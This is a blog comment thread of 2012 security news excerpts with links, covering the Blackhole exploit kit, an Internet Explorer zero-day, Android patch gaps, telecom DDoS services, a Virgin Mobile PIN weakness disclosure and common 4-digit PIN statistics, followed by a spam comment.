Rental prices run from $50 a day while leasing the software for a year costs around $1,500.
The Blackhole exploit kit has been around for about two years, during which time it has become the preferred tool for running drive-by download attacks.
The end result is that an unpatched Windows PC becomes infected with a banking Trojan, fake anti-virus or botnet agent after visiting a compromised website.
Tomi Engdahl says:
Intel to take felon-foiling tech to phones, slates
Lock up your datas
http://www.reghardware.com/2012/09/13/idf_2012_intel_to_bring_anti_theft_technology_to_tablets_and_phones/
IDF 2012 Intel has confirmed that it will bring its Anti-theft Technology (AT), currently being pitched at Ultrabooks, to Atom-based smartphones and tablets.
The timeframe for bringing AT to such devices is unclear, but it is definitely on the company’s roadmap
Intel is mandating the tech at Ultrabooks
AT utilises pre-Bios hardware to contact Intel-trusted third-party servers and determine whether the Ultrabook it is fitted to has been lost or stolen. Periodic checks when the machine boots or when it comes out of deep sleep verify it is the hands of its owner.
Intel has a bright sticker to warn
Tomi Engdahl says:
Early Results from X-Ray: Over 50% of Android Devices are Vulnerable
https://blog.duosecurity.com/2012/09/early-results-from-x-ray-over-50-of-android-devices-are-vulnerable/
Since we launched X-Ray, we’ve already collected results from over 20,000 Android devices worldwide. Based on these initial results, we estimate that over half of Android devices worldwide have unpatched vulnerabilities that could be exploited by a malicious app or adversary.
Yes, it’s a scary number, but it exemplifies how important expedient patching is to mobile security and how poorly the industry (carriers, device manufacturers, etc) has performed thus far.
As carriers are very conservative in rolling out patches to fix vulnerabilities in the Android platform, users’ mobile devices often remain vulnerable for months and even years.
Tomi Engdahl says:
According to international KPMG’s Cyber Vulnerability Index 2012 survey, most of the Forbes 2000 companies (75 percent) are leaking out information through network attacks.
Source: http://www.tietokone.fi/uutiset/kolme_neljasta_yrityksesta_vuotaa_tietoja
Tomi Engdahl says:
With the wave of a hand, Intel wants to do away with passwords
http://www.reuters.com/article/2012/09/13/us-intel-passwords-idUSBRE88C1A120120913
Passwords for online banking, social networks and email could be replaced with the wave of a hand if prototype technology developed by Intel makes it to tablets and laptops.
“The problem with passwords — we use too many of them, their rules are complex, and they differ for different websites,” Sridhar Iyengar, director of security research at Intel Labs, said at the annual Intel Developer Forum in San Francisco on Thursday. “There is a way out of it, and biometrics is an option.”
Tomi Engdahl says:
Firmware maker says it could enable dual-boot Windows RT, Android devices
http://www.pcworld.com/article/262306/firmware_maker_says_it_could_enable_dualboot_windows_rt_android_devices.html#tk.rss_news
Tablets and PCs could come with a dual-boot capability to load either Microsoft’s upcoming Windows RT or Android, but device makers will need to be interested in building such devices in order for it to make its way to the public, firmware company Insyde Software said on Thursday.
The company can provide the firmware and tools based on standard UEFI boot specifications for the dual-boot Windows RT and Android devices, and the company has seen interest from some device and chip makers,
Tomi Engdahl says:
Users told: Get rid of Internet Explorer (again)
It’s more like an exploit than a browser
http://www.theregister.co.uk/2012/09/17/yet_another_explorer_zero_day/
Internet Explorer users have been told to ditch the application and switch to another browser, pronto.
The warning comes from Rapid7, which describes a hole that’s exploitable by visiting a malicious Website (and, of course, in the world of Twitter and shortened URLs, it’s so much easier to get users to visit such sites).
Visiting a malicious site gives the attacker the same privileges as the current user
Although the published exploit targets XP, Rapid7 says the attack works on IE 7 through 9 running on XP, Vista and Windows 7.
Romang claims the exploit was created by the same group – Nitro – that recently released a Java zero-day into the wild.
This is one of the few times that a vulnerability has been successfully exploited across all the production shipping versions of the browser and OS
Tomi Engdahl says:
In Internet Explorer, a serious risk – protect yourself against this
When the surfer ends up getting viruses from infecting your website, the site owner can take possession of the computer used for surfing.
There is no correction for this yet.
Microsoft recommendations:
Install: Enhanced Mitigation Experience Toolkit v3.0
Set IE security: intranet and the Internet security level to “high.”
Source: http://www.iltasanomat.fi/digi/art-1288500272218.html
Enhanced Mitigation Experience Toolkit v3.0
A toolkit for deploying and configuring security mitigation technologies
http://www.microsoft.com/en-us/download/details.aspx?id=29851
Critical zero-day bug in Internet Explorer under active attack
Remotely triggered vuln can affect a wide variety of IE and Windows versions.
http://arstechnica.com/security/2012/09/critical-zero-day-bug-in-microsoft-internet-explorer/
Tomi Engdahl says:
DDoS crooks: Do you want us to blitz those phone lines too?
Miscreants offer to down mobe and fixed line services for $20 a day
http://www.theregister.co.uk/2012/08/02/telecoms_ddos/
Cybercrooks are now offering to launch cyberattacks against telecom services, with prices starting at just $20 a day.
Distributed denial of attacks against websites or web services have been going on for many years. Attacks that swamped telecoms services are a much more recent innovation, first starting around 2010.
attacks on telecom lines are launched using attack scripts on compromised Asterisk (software PBX) server.
Default credentials are one of the main security weaknesses used by hackers to initially gain access to a VoIP/PBX systems prior to launching voice mail phishing scams or running SIP-based flooding attacks, say researchers.
Telecoms-focused denial of service attacks are motivated by the same sorts of motives as a DDoS on a website.
“Typical motives can be anything from revenge, extortion, political/ideological, and distraction from a larger set of financial crimes,” a blog post by Curt Wilson of DDoS mitigation experts Arbor Networks explains.
Poorly configured VoIP systems can be brought down even by something as simple as a port scan, Wilson notes.
Tomi Engdahl says:
Virgin Mobile fails web security 101, leaves six million subscriber accounts wide open
http://kev.inburke.com/kevin/open-season-on-virgin-mobile-customer-data/
Anyone who knows your Virgin Mobile USA phone number can:
see who you’ve been calling and texting,
change the handset associated with your number,
change your address, your email address, or your password,
purchase a handset on your behalf
There is no way to defend against this attack.
I reported the issue to Virgin Mobile USA a month ago and they have not taken any action, nor informed me of any concrete steps to fix the problem, so I am disclosing this issue publicly.
Virgin Mobile forces you to use your phone number as your username, and a 6-digit number as your password. This means that there are only one million possible passwords you can choose.
This is horribly insecure
It is trivial to write a program that checks all million possible password combinations, easily determining anyone’s PIN inside of one day. I verified this by writing a script to “brute force” the PIN number of my own account.
Virgin Mobile Shrugs as Coder Warns Accounts Are Easily Hijacked
http://www.wired.com/threatlevel/2012/09/virgin-mobile/
Burke, who works as a developer at Twilio, says he’s used to looking at security issues thanks to his day job, and noticed how weak the authentication system was. Once he proved to himself that anyone could bust in with a few lines of code, he contacted the company.
“I tried to escalate it following responsible disclosure principles,” Burke said. After eventually finding someone who understood the problem, Burke repeatedly followed up, only to eventually be told not to expect any change.
He then decided to go public so that people would know they were at risk — though there’s nothing users can do to protect themselves, except not use Virgin Mobile.
The fixes, according to Burke, start with allowing more complex passwords and locking down accounts after a few failed attempts.
While Virgin Mobile may consider its insecure system to be “standard industry practice,” Twitter ended up signing a 20-year consent decree with federal regulators over its shoddy security practices. One key element in the FTC’s action? Twitter didn’t prevent rapid guessing of passwords.
Tomi Engdahl says:
Asian hackers p0wned by Eastern European rivals
Former Soviet bloc countries hack hardest, says former presidential security man
http://www.theregister.co.uk/2012/09/20/eastern_european_hackers_beat_asia/
Cyber criminals from Eastern Europe present a more sophisticated information security threat to Western firms than their rivals in East Asia, according to a surprising new assessment of the global threat landscape by a former White House cyber security advisor.
Peter the Great vs. Sun Tzu is a new report from Tom Kellerman, cyber security VP at Trend Micro
In it, he reveals seven reasons why the researchers at Trend Micro believe “hackers from the former Soviet bloc are a more sophisticated and clandestine threat than their more well-known East Asian counterparts”.
Eastern European hackers are organised in small, independent mercenary units which live or die by the quality of their work and are motivated solely by profit, meaning they’re capable of more precise and focused attacks and aim to steal credentials that can be sold on the black market.
The report likens East Asian cyber criminals, on the other hand, to “cyber foot soldiers” tasked with gathering information for their commanders
Tomi Engdahl says:
PIN analysis
“All credit card PIN numbers in the World leaked”
http://www.datagenetics.com/blog/september32012/index.html
There are 10,000 possible combinations that the digits 0-9 can be arranged to form a 4-digit pin code. Out of these ten thousand codes, which is the least commonly used?
The most popular password is 1234 …
… nearly 11% of the 3.4 million passwords are 1234 !!!
he next most popular 4-digit PIN in use is 1111 with over 6% of passwords being this.
In third place is 0000 with almost 2%.
OK, we’ve investigated most frequently used PINS and found they tend to be predictable and easy to remember
Tomi says:
The Man Who Hacked the Bank of France
http://it.slashdot.org/story/12/09/20/1729224/the-man-who-hacked-the-bank-of-france
“In 2008 a Skype user looking for cheap rate gateway numbers found himself connected to the Bank of France where he was asked for a password. He typed 1 2 3 4 5 6 and found himself connected to their computer system.”
“By entering a random number, then dialing code simply 1, 2, 3, 4, 5, 6, he came very easily in the debt service of the Bank of France, without even knowing where it was BECAUSE any message showed him where he was. ”
The service is blocked 48 intrusion and this will be the cause of a two-year investigation “unbelievable,” said the lawyer
Gemma Smith says:
Amazing Piece, I’ve taken a look at other useful resources very much the same but really really enjoyed your actual posting approach, I am going to stop by all of your web page once more.Good Article, I’ve read through many other subjects similar but really really liked all your writing manner, For certain I will check out all of your webpage in the future.